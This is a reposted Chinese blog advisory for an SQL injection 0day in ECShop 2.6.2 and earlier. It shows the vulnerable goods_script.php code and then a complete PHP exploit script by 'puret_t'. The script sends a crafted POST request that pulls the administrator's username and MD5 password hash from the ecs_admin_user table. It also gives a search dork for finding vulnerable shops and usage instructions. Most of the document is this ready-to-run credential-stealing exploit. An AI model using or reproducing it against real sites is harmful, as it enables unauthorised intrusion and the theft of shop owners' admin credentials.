[hack]ECShop <= v2.6.2 SQL injection 0day
2009年11月24日星期二 | | |ECShop <= v2.6.2 SQL injection 0day
作者:Ryat
影响2.5.x和2.6.x,其他版本未测试
goods_script.php44行:
- if (emptyempty($_GET['type']))
- {
- ...
- }
- elseif ($_GET['type'] == 'collection')
- {
- ...
- }
- $sql .= " LIMIT " . (!emptyempty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
- $res = $db->query($sql);
$sql没有初始化,很明显的一个漏洞:)
EXP:
- #!/usr/bin/php
- <?php
- print_r('
- +---------------------------------------------------------------------------+
- ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
- by puret_t
- mail: puretot at gmail dot com
- team: http://www.smxiaoqiang.cn
- dork: "Powered by ECShop"
- +---------------------------------------------------------------------------+
- ');
- /**
- * works with register_globals = On
- */
- if ($argc < 3) {
- print_r('
- +---------------------------------------------------------------------------+
- Usage: php '.$argv[0].' host path
- host: target server (ip/hostname)
- path: path to ecshop
- Example:
- php '.$argv[0].' localhost /ecshop/
- +---------------------------------------------------------------------------+
- ');
- exit;
- }
- error_reporting(7);
- ini_set('max_execution_time', 0);
- $host = $argv[1];
- $path = $argv[2];
- $resp = send();
- preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
- if ($hash)
- exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
- else
- exit("Exploit Failed!\n");
- function send()
- {
- global $host, $path;
- $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
- $data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1";
- $data .= "Accept: */*";
- $data .= "Accept-Language: zh-cn";
- $data .= "Content-Type: application/x-www-form-urlencoded";
- $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)";
- $data .= "Host: $host";
- $data .= "Content-Length: ".strlen($cmd)."";
- $data .= "Connection: Close";
- $data .= $cmd;
- $fp = fsockopen($host, 80);
- fputs($fp, $data);
- $resp = '';
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- return $resp;
- }
- ?>
From: http://www.sai52.com/archives/873/
我的QQ空间
kmeleon.js及pref.js配置解释
K-MeleonCCF ME目录下的defaults\pref\kmeleon.js保存了K-Meleon...